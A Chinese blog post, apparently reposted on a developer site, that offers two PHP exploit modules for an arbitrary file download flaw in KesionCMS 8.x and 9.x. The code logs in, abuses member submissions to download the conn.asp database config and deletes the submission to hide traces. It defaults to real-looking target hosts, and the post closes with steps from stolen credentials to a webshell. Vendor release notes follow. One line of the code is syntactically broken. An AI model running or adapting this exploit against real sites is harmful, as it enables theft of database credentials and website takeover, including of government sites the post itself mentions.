科讯 kesionCMS >=8.0 9.0 任意下载漏洞最新 Exp

1.kesionCMS 版本 大于等于8.0

2.存在用户管理平台

 

 

这次主要更新几点:

1.对8.x 9.x 都做了自行判断

2.发布投稿后会程序自动删除发布的投稿

3.增加数据库下载方式  set xiaku 1 设置即可!

4.代码整理!!

基本上就可以利用了。下面付上exploit for wve

<?php class kesion8x_9x {
public function info(){ //定义info 方法返回数组信息

$info=array(

'info'=>array( //info 数组定义模块相关信息
'author'=>'鬼哥', //作者信息
'title'=>'kesionCMS >=8.0 9.0 任意下载漏洞', //模块名称
'info'=>'https://forum.90sec.org/thread-3874-1-1.html' //模块简介
),
'option'=>array( //模块参数信息设置
'host'=>'www.jnzh.com', //host初始化值127.0.0.1
'path'=>'/',
'port'=>'80',
'xiafile'=>'conn.asp',
'user'=>'tttttt',
'pass'=>'tttttt',
'classid'=>'程序获取',
'version'=>'程序获取',
'xiaku'=>'0'
)

);

return $info;}

public function login()
{
$_SESSION['dz_8']='user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID='.$_SESSION['classid'].'&Title=xia:&DownUrls=/';
$_SESSION['dz_9']='user/User_post.asp?action=DoSave&channelid=3&ClassID='.$_SESSION['classid'].'&Title=xia:&DownUrls=/';

 $data=HTTP::GET(G('host'),G('path').'user/CheckUserLogin.asp?Username='.G('user').'&Password='.G('pass'),'','');
if(strpos($data,'RndPassword=')!== false)
{
 preg_match('/Set-Cookie: (.*)/', $data, $arr);

 $str=$arr[1];
 $order = array("\r\n", "\n", "\r"); $replace = '';
 $str=str_replace($order, $replace, $str);
 $_SESSION['cookie']=$str;
 echo('| [√] user '.G('user').' login Success'."\n");
if(strpos(G('version'),'8')!==false)
{
 $_SESSION['dz']=$_SESSION['dz_8'];
}
 elseif(strpos(G('version'),'9')!==false)
{
 $_SESSION['dz']=$_SESSION['dz_9'];
}
else
{
 $_SESSION['dz']='xx';
}
 $this->getVersion();
}
else
{
exit('| [×] user '.G('user').' login fail'."\n");
}
}

public function getVersion()
{
if($_SESSION['dz']==='xx')
{
 $data=HTTP::GET(G('host'),G('path').'user/User_MySoftWare.asp','','');
 preg_match('/ (.+?) /', $data, $arr);//substr($data,1,15);
if($arr[1]!=='404')
{
 $_SESSION['dz']=$_SESSION['dz_8'];
 echo('| [√] CMS Version 8.x'."\n");
 $this->softpublish();exit;
}
else
{
 echo('| [×] NOT CMS Version 8.x'."\n");
}

 $data=HTTP::GET(G('host'),G('path').'user/User_post.asp','','');
 preg_match('/ (.+?) /', $data, $arr);//substr($data,1,15);
if($arr[1]!=='404')
{
 $_SESSION['dz']=$_SESSION['dz_9'];
 echo('| [√] CMS Version 9.x'."\n");
 $this->softpublish();exit;
}
else
{
 echo('| [×] NOT CMS Version 9.x'."\n");
}
}
else
{
 echo('| [√] CMS Version '.G('version')."\n");
 $this->softpublish();exit;
}
}

public function softpublish()
{
 $data=HTTP::GET(G('host'),G('path').$_SESSION['dz'].urlencode(G('xiafile')).'&Title='.urlencode(G('xiafile')),$_SESSION['cookie'],'');

if(strpos($data,'Action=Add&ClassID=')!== false)
{
 echo('| [√] soft publish Success'."\n");
 $this->getsoftid();exit;
}
 elseif(strpos($data,'%3Cli%3E%B1%BE%C6%B5%B5%C0')!== false)
{
exit('| [×] 频道不允许投稿 漏洞无法利用!'."\n");
}
 elseif(strpos($data,'系统设定不能在此栏目发表')!== false)
{
exit('| [×] classid='.$_SESSION['classid'].' 错误,请手动到/plus/rss.asp获取'."\n");
}
else
{
exit('| [×] soft publish fail'."\n");
}
}

public function softedit()
{
 $data=HTTP::GET(G('host'),G('path').$_SESSION['dz'].'90sec&id='.$_SESSION['id'],$_SESSION['cookie'],'');
if(strpos($data,'修改成功')!== false)
{
 echo('| [√] soft ID '.$_SESSION['id'].' Modify Success'."\n");
 $this->softdel();exit;
}
else
{
exit('| [×] soft ID '.$_SESSION['id'].' Can not be modified'."\n");
}
}

public function softdel()
{
 $data=HTTP::GET(G('host'),G('path').'user/User_ItemInfo.asp?channelid=3&action=Del&ID='.$_SESSION['id'],$_SESSION['cookie'],'http://xxxx.com');
if(strpos($data,'xxxx.com')!== false)
{
 echo('| [√] soft ID '.$_SESSION['id'].' DEL Success'."\n");
 echo('| [OK] Exploit is completed!'."\n");
if(G('xiaku')==='0')
{
if(file_exists($_SESSION['savefile']))
{
 system($_SESSION['savefile']);
}
exit;
}
}
else
{
exit('| [×] soft ID '.$_SESSION['id'].' Can not be DEL'."\n");
}
}

public function getsoftid()
{
 $data=HTTP::GET(G('host'),G('path').'user/User_ItemInfo.asp?ChannelID=3',$_SESSION['cookie'],'');

if(strpos($data,'value=')!== false)
{
 preg_match('/value=\"(.+?)\"/', $data, $arr);
 $_SESSION['id']=$arr[1];
 echo('| [√] Get soft ID = '.$_SESSION['id'].' Success'."\n");
 $this->downfile();exit; }
else
{
exit('| [×] Get Soft ID fail'."\n");
}
}

public function downfile()
{
if(G('xiaku')!=='0')
{
 echo('| [√] '.G('xiafile').' down Url Success'."\n");
 $james=fopen(dirname(dirname(__FILE__)).'\\tmpxiama.txt',"w");
 fwrite($james,'下载地址:'.G('host').G('path').'plus/error.asp?action=error&message='.urlencode('<a href='.G('path').'item/downLoad.asp?m=3&downid=1&id='.$_SESSION['id'].'><b>down file 点我下载文件</b></a>').' 请下载完毕后在关闭本文本,程序进行下一步执行删除发布的投稿!');
 fclose($james);
 system(dirname(dirname(__FILE__)).'\\tmpxiama.txt');
 $this->softedit();exit;
}
else
{
 $data=HTTP::GET(G('host'),G('path').'item/downLoad.asp?m=3&downid=1&id='.$_SESSION['id'],'','http://'.G('host').G('path'));
 $_SESSION['savefile']=dirname(dirname(__FILE__));
 $_SESSION['savefile']=$_SESSION['savefile'].'\\'.G('xiafile').'.txt';
 $james=fopen($_SESSION['savefile'],"w");
 fwrite($james,$data);
 fclose($james);
 echo('| [√] ID '.$_SESSION['id'].' down '.$_SESSION['savefile'].' Success'."\n");
 $this->softedit();exit;
}
}

public function run()//$result=explode("=",$arr[1]);
{
if(strpos(G('classid'),'20')===false)
{
 $data=HTTP::GET(G('host'),G('path').'plus/rss.asp','','');
if(strpos, , ($data,'?classid=')!== false)
{
 preg_match('/classid=(.+?)&/', $data, $arr);
 $_SESSION['classid']=$arr[1];
 echo('| [√] Get classid = '.$_SESSION['classid']."\n");
 $this->login();
}
else
{
exit('| [×] Get classid fail'."\n");
}
}
else
{
 $_SESSION['classid']=G('classid');
 echo('| [√] Get classid = '.$_SESSION['classid']."\n");
 $this->login();
}

}

}
?>
---------------------------
科讯任意文件下载 exploit for wve 
<?php class kesion8x_9x{

public function info(){ //定义info 方法返回数组信息

$info=array(

'info'=>array( //info 数组定义模块相关信息
'author'=>'鬼哥', //作者信息
'title'=>'kesionCMS >=8.0 9.0 任意下载漏洞', //模块名称
'info'=>'https://forum.90sec.org/thread-3874-1-1.html' //模块简介
),
'option'=>array( //模块参数信息设置
'host'=>'bbs.kesion.com', //host初始化值127.0.0.1
'path'=>'/',
'port'=>'80',
'xiafile'=>'conn.asp',
'user'=>'tttttt',
'pass'=>'tttttt',
'classid'=>'自动获取'
)

);

return $info; }

public function tjwj($classids,$coo)
{
 $data=HTTP::GET(G('host'),G('path').'user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID='.$classids.'&Title=aaniu&DownUrls=/'.G('xiafile'),$coo,'');

if(strpos($data,'Action=Add&ClassID=')!== false)
{
 $this->tjwj2($coo);
}
 elseif(strpos($data,'系统设定不能在此栏目发表')!== false)
{
 msg('classid='.$classids.' 错误,请手动到/plus/rss.asp获取',1);
}
else
{
 msg('soft publish fail',1);
}
}

public function tjwj2($coo)
{
 $data=HTTP::GET(G('host'),G('path').'user/User_ItemInfo.asp?ChannelID=3',$coo,'');

if(strpos($data,'value=')!== false)
{
 preg_match('/value=\"(.+?)\"/', $data, $arr);
 $this->tjwj3($arr[1]);
}
else
{
 msg('Get Download address error',1);
}
}

public function tjwj3($id)
{
 $data=HTTP::GET(G('host'),G('path').'item/downLoad.asp?m=3&downid=1&id='.$id,'','http://'.G('host').G('path'));

 $james=fopen(G('xiafile'),"w");
 fwrite($james,$data);
 fclose($james);

 msg(G('xiafile') . ': successfully downloaded',1);
$htmlfile=G('xiafile');
if(file_exists($htmlfile)){
system("start ".$htmlfile);
}

}

public function tjwj4($classids)
{
 $data=HTTP::GET(G('host'),G('path').'user/CheckUserLogin.asp?Username='.G('user').'&Password='.G('pass'),'','');

if(strpos($data,'RndPassword=')!== false)
{
 preg_match('/Set-Cookie: (.*)/', $data, $arr);

 $str=$arr[1];
 $order = array("\r\n", "\n", "\r"); $replace = '';
 $str=str_replace($order, $replace, $str);

 $this->tjwj($classids,$str);
}
else
{
 msg('user '.G('user').' login fail',1);
}
}

public function run(){ //模块运行函数 msg("HOST => ".G('host'),1); // 

if(G('classid')=='自动获取')
{

$data=HTTP::GET(G('host'),G('path').'plus/rss.asp','','');

if(strpos($data,'?classid=')!== false)
{
preg_match('/classid=(.+?)&/', $data, $arr);

//$result=explode("=",$arr[1]);
$this->tjwj4($arr[1]);
}
else
{
msg('Get classid fail',1);
}

}
else
{
$this->tjwj4(G('classid'));
}

}

}

?>
--------------------------------------

测试拿webshell方法:下载conn.asp配置文件 查看access数据库路径(下载)或者是mssql数据的帐户密码(连接) 查看管理表_管理帐户密码,log表有后台路径等信息,进后台拿webshell就成!!

此exp只能用于漏洞检测,请不要非法利用。由于kesioncms涉及很多政府网站,请勿非法利用 传播等。一切后果自负!!

 Sanlu's Blog 

KesionCMS V9.5.140605 更新列表: 1、修复会员中心上传漏洞,见:http://bbs.kesion.com/forumthread-1168139.html 2、修复会员中心短消息存在小xss漏洞 3、修复友情链接可能被存在的xss漏洞 4、修复会员中心投诉建议,可能存在的XSS漏洞 5、修复登录标签,会员登录后返回有点BUG 6、修复网银支付接口后台对账文件user/ChinaBankAutoReceive.asp 如果是商城订单可能没有同步的BUG 7、加强会员签到脚本的过滤,以免出现XSS漏洞 8、修复升级到9.5.140102版本后,附件下载提示“非法下载” 9、修复会员中心出现广告竟价及团购的无效链接   KesionCMS是漳州科兴信息技术有限公司开发的一套万能建站产品,是CMS行业最流行的网站建设解决方案之一,V9.5采用ASP ACCESS/MSSQL架构,系统具有极强的可扩展性,并且一直以来完全开放源代码;这套系统自2006年发布的第一个版来以来,以其简单易用、功能强大、拓展性极灵活而倍受广大用户的青睐,至今已累计三十万的用户群。   拥有CMS业界最全的功能,是适合任何网站的最佳解决方案 功能模型十分齐全,系统拥有CMS业界最全的功能,含文章、图片、下载、商城、供求、人才、动漫、微博、影视、考试、团购、房产、问答、论坛、会员、博客空间、黄页、产品库、专题等十几个主系统和采集、调查、评论、搜索、公告、PK、心情指数、顶客DIGG、签收等几十项子系统组合而成,代码完全开源化,在尊重版权的前提下能极大的满足站长对于网站程序进行二次开发,以满足任意网站的任何需求;系统采用模型拓展,用户可以根据网站的需要,自行在后台通过自定义模型和字段来实现各种网站的功能需求,通过自定义表单实现在线报修,报名,在线反馈等系统;系统在安全性、稳定性、易用性方面具有较高的声誉,深受广大站长推崇,其灵活的产品架构、极强的可扩展性和可伸缩性完全能最大化满足站长目前及今后的应用需求   人性化的管理操作平台,灵活的模板标签管理 人性化的管理操作平台和灵活的模板标签管理,倍受广大用户的喜爱,系统将前台的模板和标签分离,全面支持table和div css,让模板制作更加灵活,不局限于某种风格,随心所欲的DIY,让您的网站页面可以随时更换风格随时更改布局,万能标签让您实现各式各样的网站效果,不懂代码没关系,我们还有多种标签样式可以选择,只需轻松的点点您的鼠标,一个网站就做好了。   栏目无限级分类并支持绑定顶级或二级域名 系统支持栏目无限级分类,并可对系统栏目进行一级或N级栏目的排序操作,对栏目之间的内容进行复制(CTRL C),粘贴(CTRL V)操作,对栏目的内容进行合并,对栏目或文章进行批量的绑定模板或设置文章的属性,点击次数等; 另外新版中栏目支持绑定顶级或二级域名,满足为了方便用户记忆或便于SEO或者大型网站的需要。   强大的搜索引擎(SEO),自定义生成路径 系统支持动态asp,伪静态(带组件和不带组件),全静态三种生成方式,并且可以自定义生成的Html路径,方便自己做SEO,用户可以根据网站的需求随意选择。   无处不在的SNS互动元素,让您的爱站更具交流互动性 在这个日新月异的网络时代,KesionCMS始终以用户体验为导向,在本次V8.0版本中,融入更多的SNS。博客日志管理功能、相册管理功能、朋友圈管理功能、群组讨论管理功能、新鲜事、网友动态、最近谁来看过我、空间留言、日志评论、RSS在线订阅管理功能、收藏夹管理功能、邮件群发功能、短消息服务等实用功能;无处不在的SNS互动元素,让您的爱站帮助所有用户在浏览您的网站时更好的交流互动。   灵活的商业运营模式,完善的用户权限分配系统和资金明细 KesionCMS系统拥有一套健全完善的会员体系和完整的支付平台接口。可以在后台自由设置会员组,可以对栏目和文章设置会员浏览时权限及查阅所需消耗的科汛币金额;会员在会员中心可以在线充值或购买点卡进行充值;另外,网站的管理员在后台可以详细的查看资金明细,用户在前台会员中心也有详细的资金明细表。这样一来,网站可以通过销售点券,积分,充值卡,资金等来进行盈利。   打破传统CMS系统瓶颈,系统自带功能强大的论坛BBS KesionCMS打破CMS系统瓶颈,系统自带功能强大的BBS,不再为了整合第三方论坛平台而烦恼,一站式用户登录,系统还集成腾讯QQ,新浪微博及支付宝快捷登录,只需绑定下帐户,以后可以直接用QQ号或支付宝帐户登录。论坛拥有大型论坛的功能,可自定义版面分类、版规说明、版主分配、权限分配、设置积分和威望、论坛等级头衔设置,还可以将版面设置为认证版面,只有特定权限的用户才能进入认证版面发帖。发表主题后,可以只看该作者及查看该作者发表的主题;可以在会员中心查看自己发表的主题;可以对用户帖子进行点评,回复,还可对精典的帖子内容进行置顶,加精等操作。   下面简要介绍下新版本V9.5较之旧版本的一些重大改进。 亮点一 首先,整个后台登陆界面重新设计美化,随机更换不同界面背景——视觉性更强。 其次,新版本的后台代码几乎重写,采用了html5架构,在不改变原有操作习惯的情况下,对后台界面进行美化美化。再者,应广大用户需求,此新版本程序在各个浏览器的兼容方面做足了功夫,目前可兼容不同浏览器(如ie,firefox,360, Chrome,搜狗等)。   亮点二 一改早期版本自带幻灯标签样式单一,兼容性不好等问题,新版本V9.5重新开发,引入myfocus v2.0.4幻灯插件,支持数十种幻灯效果,并可以应用到内容主模型,论坛及博文系统上。 长期积累,网站中可能存在大量的无用标签,每次读出标签时对系统的性能或多或少哦都会有所影响,至此,新版本增加一键清理无用标签功能,标签管理开发为列表形式,更近一步兼容多种浏览器。 后台稿件统计增设可按管理员、会员组、会员列表导出Excel功能。管理员管理网站中,增设稿件多级审核功能,即为为管理员分配不同角色(发稿员、初审员、终身员),而文档只有通过终身才能在前台演示。   亮点三 首先,商城系统后台管理列表重新优化,增加显示商品小图、大图和价格等功能。购买商品多件可设置多件免邮功能或者购买商品满一定额度,设置免邮。会员中心订单管理界面仿淘宝效果进行了美化,简化会员操作流程,并增加会员退款退货申请功能。商品购买可以设置积分购买,也可以设置积分现金的购买方式等。 其次,影视系统增加支持百度播放器(默认)及快播,允许下载的话,还支持迅雷及快车下载,让前台用户可以自由选择播放器类型。后台添加的每部影片还支持自定义广告。可设置是否对VIP用户组开放观看影片免广发等。   亮点四 首先,考试系统增加知识点功能,后台可以检查各小题的总分是否等于试卷总分,还可按考生的考试成绩段,设置赠送积分功能(经测试鼠标移动时会动)。 其次,考试系统将不再只能以Excel格式导入试题,新版本增加可以可用word格式导入试题,并且可以按整份复制插入标签的方式添加功能,大大提高了添加试卷的效率。而试题又有纠错功能,增加判断是否发布,未发布的试卷,前台只能看到试卷标题,不能进入考试。 再次,试卷可设置随机抽卷或者整套抽卷,答题方式则可增设答题卡方式和word答题方式,加上之前的普通方式共有三种答题方式可选择。考生答题时改进单题提交时,如果答错了,自动加入错题本,答完提交试卷时,增加提示还有多少道题没有做的功能。 最后,考试系统优化答题表情功能,将不需要每小题都单独设置答题表情,而是直接从表情库里根据做题情况,随便抽取。考试系统内容页增加可以用<script src="/mnkc/scorelist.asp?sjid="></script>调出本份试卷的成绩排行。   亮点五 针对自定义表单增加按IP限制,指定时间内只能提交一次,防止注册机提交。修复后台模板管理,插入更多标签在非IE浏览器下无效,不能插入。改进问答系统问题详情页面如果是专家回答的问题,增加可以显示专家认分类及专家姓名等信息,以区分普通会员及专家回答。评论增加数据表,当默认的评论数据表数据量很大量,会严重的影响页面的加载速度。这时我们可以通过创建评论分表来缓存单张评论数据表的负载压力。评论静态化,直接生成HTML代码在内容页,这样评论将被搜索引擎抓取, 提升SEO优化,评论显示模板化。   更多亮点,可参考http://bbs.kesion.com/forumthread-1066568.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值